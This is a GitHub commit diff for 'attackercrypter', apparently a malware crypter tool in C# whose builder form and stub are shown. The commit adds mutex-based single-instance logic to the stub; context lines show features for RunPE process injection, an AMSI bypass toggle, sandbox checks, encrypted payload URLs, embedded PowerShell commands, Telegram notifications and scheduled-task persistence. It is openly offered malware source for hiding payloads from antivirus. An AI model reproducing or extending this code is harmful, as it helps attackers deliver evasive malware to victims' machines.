Skip to content

Commit c43dfc4

Browse files
TheNewAttacker64TheNewAttacker64
authored
Add files via upload
1 parent 3260bb2 commit c43dfc4

File tree

4 files changed

+145
-21
lines changed

4 files changed

+145
-21
lines changed

attackercrypter/Form1.Designer.cs

Lines changed: 51 additions & 0 deletions
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.

attackercrypter/Form1.cs

Lines changed: 35 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -38,7 +38,12 @@ public Form1()
3838

3939
}
4040

41-
41+
public static string GenerateMutexName(string prefix)
42+
{
43+
int processId = Process.GetCurrentProcess().Id;
44+
string uniqueId = Guid.NewGuid().ToString("N");
45+
return $"{prefix}_{processId}_{uniqueId}";
46+
}
4247
public static string Encrypt(byte[] plainBytes, string base64Key, string base64IV)
4348
{
4449
byte[] key = Convert.FromBase64String(base64Key);
@@ -157,6 +162,10 @@ private void button2_Click(object sender, EventArgs e)
157162
MessageBox.Show("Please choose your payload architecture x64 or x32");
158163

159164
}
165+
else if (string.IsNullOrEmpty(mutex.Text))
166+
{
167+
MessageBox.Show("Please Generate a Mutex");
168+
}
160169

161170

162171

@@ -187,7 +196,7 @@ private void button2_Click(object sender, EventArgs e)
187196
Params.ReferencedAssemblies.Add(typeof(System.Linq.Enumerable).Assembly.Location);
188197
Params.ReferencedAssemblies.Add("System.Drawing.dll");
189198

190-
199+
Source = Source.Replace("$MUTEX", mutex.Text);
191200

192201
if (Sleeptime.Checked)
193202
{
@@ -212,7 +221,8 @@ private void button2_Click(object sender, EventArgs e)
212221

213222

214223
}
215-
else if (checkBox2.Checked && radioButton2.Checked) {
224+
else if (checkBox2.Checked && radioButton2.Checked)
225+
{
216226
Source = Source.Replace("public static int taskm = 0;", $"public static int taskm = {numericUpDownSc.Value.ToString()};");
217227
Source = Source.Replace("public static bool istask = false;", "public static bool istask = true;");
218228

@@ -247,13 +257,13 @@ private void button2_Click(object sender, EventArgs e)
247257
Source = Source.Replace("$chatid", chatid);
248258
Source = Source.Replace("public static bool istelegramnotify = false;", "public static bool istelegramnotify = true;");
249259
}
250-
260+
251261

252262

253263
}
254-
255-
256-
264+
265+
266+
257267
}
258268
if (sock.Checked)
259269
{
@@ -291,7 +301,7 @@ private void button2_Click(object sender, EventArgs e)
291301
Source = Source.Replace("public static bool ispwcommand = false;", "public static bool ispwcommand = true;");
292302
byte[] bytes = System.Text.Encoding.Unicode.GetBytes(powershellcommand.Text);
293303
string encodedCommand = System.Convert.ToBase64String(bytes);
294-
Source = Source.Replace("$command",encodedCommand );
304+
Source = Source.Replace("$command", encodedCommand);
295305
}
296306
if (Amsi.Enabled == true)
297307
{
@@ -300,25 +310,25 @@ private void button2_Click(object sender, EventArgs e)
300310

301311
if (Injection.SelectedItem.ToString() == "AssemblyLoad(.Net)")
302312
{
303-
MessageBox.Show("Note: This injection only works with .net files", "Attacker-Crypter",MessageBoxButtons.OK, MessageBoxIcon.Warning);
313+
MessageBox.Show("Note: This injection only works with .net files", "Attacker-Crypter", MessageBoxButtons.OK, MessageBoxIcon.Warning);
304314
Source = Source.Replace("public static bool isdotnetload = false;", "public static bool isdotnetload = true;");
305315

306316
}
307-
else if(Injection.SelectedItem.ToString().ToUpper()== "RUNPE" && runpecheck.Checked == false)
317+
else if (Injection.SelectedItem.ToString().ToUpper() == "RUNPE" && runpecheck.Checked == false)
308318
{
309319
MessageBox.Show("Please enable and configure RunPE Settings", "Attacker-Crypter", MessageBoxButtons.OK, MessageBoxIcon.Warning);
310320
everytihnggood = 0;
311321
}
312322
else if (Injection.SelectedItem.ToString().ToUpper() == "RUNPE" && runpecheck.Checked == true)
313323
{
314-
324+
315325
if (isNet.Checked == true)
316326
{
317327
Source = Source.Replace("public static bool isNet = false;", "public static bool isNet = true;");
318328
Source = Source.Replace("#DOTNETINJECTPATH", Netinjectionpath.SelectedItem.ToString());
319329

320330
}
321-
else if(isNative.Checked == true)
331+
else if (isNative.Checked == true)
322332
{
323333
Source = Source.Replace("public static bool isNative = false;", "public static bool isNative = true;");
324334

@@ -391,7 +401,7 @@ private void button2_Click(object sender, EventArgs e)
391401
Main = Main.Replace("$URL", Convert.ToBase64String(Encoding.UTF8.GetBytes(textBox4.Text)));
392402
Main = Main.Replace("$key", textBox2.Text);
393403
Main = Main.Replace("$IV", textBox3.Text);
394-
CompilerResults Results = new CSharpCodeProvider(settings).CompileAssemblyFromSource(Params, Main, Source,RunPE32,RunPE64);
404+
CompilerResults Results = new CSharpCodeProvider(settings).CompileAssemblyFromSource(Params, Main, Source, RunPE32, RunPE64);
395405
if (Results.Errors.Count > 0)
396406
{
397407

@@ -409,13 +419,13 @@ private void button2_Click(object sender, EventArgs e)
409419
everytihnggood = 0;
410420
return;
411421
}
412-
413422

414423

415424

416425

417426

418-
427+
428+
419429

420430

421431
}
@@ -533,5 +543,15 @@ private void pictureIcon_Click(object sender, EventArgs e)
533543
{
534544

535545
}
546+
547+
private void label15_Click(object sender, EventArgs e)
548+
{
549+
550+
}
551+
552+
private void mutexgen_Click(object sender, EventArgs e)
553+
{
554+
mutex.Text = GenerateMutexName("attackercrypter");
555+
}
536556
}
537557
}

attackercrypter/Resources/Program.cs

Lines changed: 58 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -41,6 +41,42 @@ public struct StartupInfo
4141
[FieldOffset(64)]
4242
public ushort wShowWindow;
4343
}
44+
45+
46+
static Mutex hotMutex()
47+
{
48+
var keyword = config.Mutex;
49+
Mutex mutex = null;
50+
51+
try
52+
{
53+
54+
mutex = Mutex.OpenExisting(keyword);
55+
}
56+
catch (WaitHandleCannotBeOpenedException)
57+
{
58+
mutex = new Mutex(false, keyword);
59+
}
60+
61+
if (mutex.WaitOne(TimeSpan.Zero, true))
62+
{
63+
return mutex;
64+
}
65+
else
66+
{
67+
mutex.Close();
68+
return null;
69+
}
70+
}
71+
72+
static void sayebMutex(Mutex mutex)
73+
{
74+
if (mutex != null)
75+
{
76+
mutex.ReleaseMutex();
77+
mutex.Dispose();
78+
}
79+
}
4480
[DllImport("kernel32")]
4581
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
4682
[DllImport("kernel32")]
@@ -416,13 +452,29 @@ static string niklhaomha(string zebi)
416452
[STAThread]
417453
static void Main()
418454
{
419-
Console.WriteLine("Normal Task");
420-
Application.EnableVisualStyles();
421-
Application.SetCompatibleTextRenderingDefault(false);
455+
var mutexstep = hotMutex();
456+
if (mutexstep != null)
457+
{
458+
try
459+
{
460+
461+
Application.EnableVisualStyles();
462+
Application.SetCompatibleTextRenderingDefault(false);
422463

423-
Sandboxzebizebi();
424-
Thread.Sleep(1000);
425-
niklhaomha("3ASBA");
464+
Sandboxzebizebi();
465+
Thread.Sleep(1000);
466+
niklhaomha("3ASBA");
467+
468+
}
469+
finally
470+
{
471+
sayebMutex(mutexstep);
472+
}
473+
}
474+
else
475+
{
476+
Environment.Exit(0);
477+
}
426478

427479

428480

attackercrypter/Resources/config.cs

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -39,5 +39,6 @@ internal class config
3939

4040
public static string dotnetipath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "#DOTNETINJECTPATH");
4141
public static string command = "$command";
42+
public static string Mutex = "$MUTEX";
4243
}
4344
}

0 commit comments

Comments
 (0)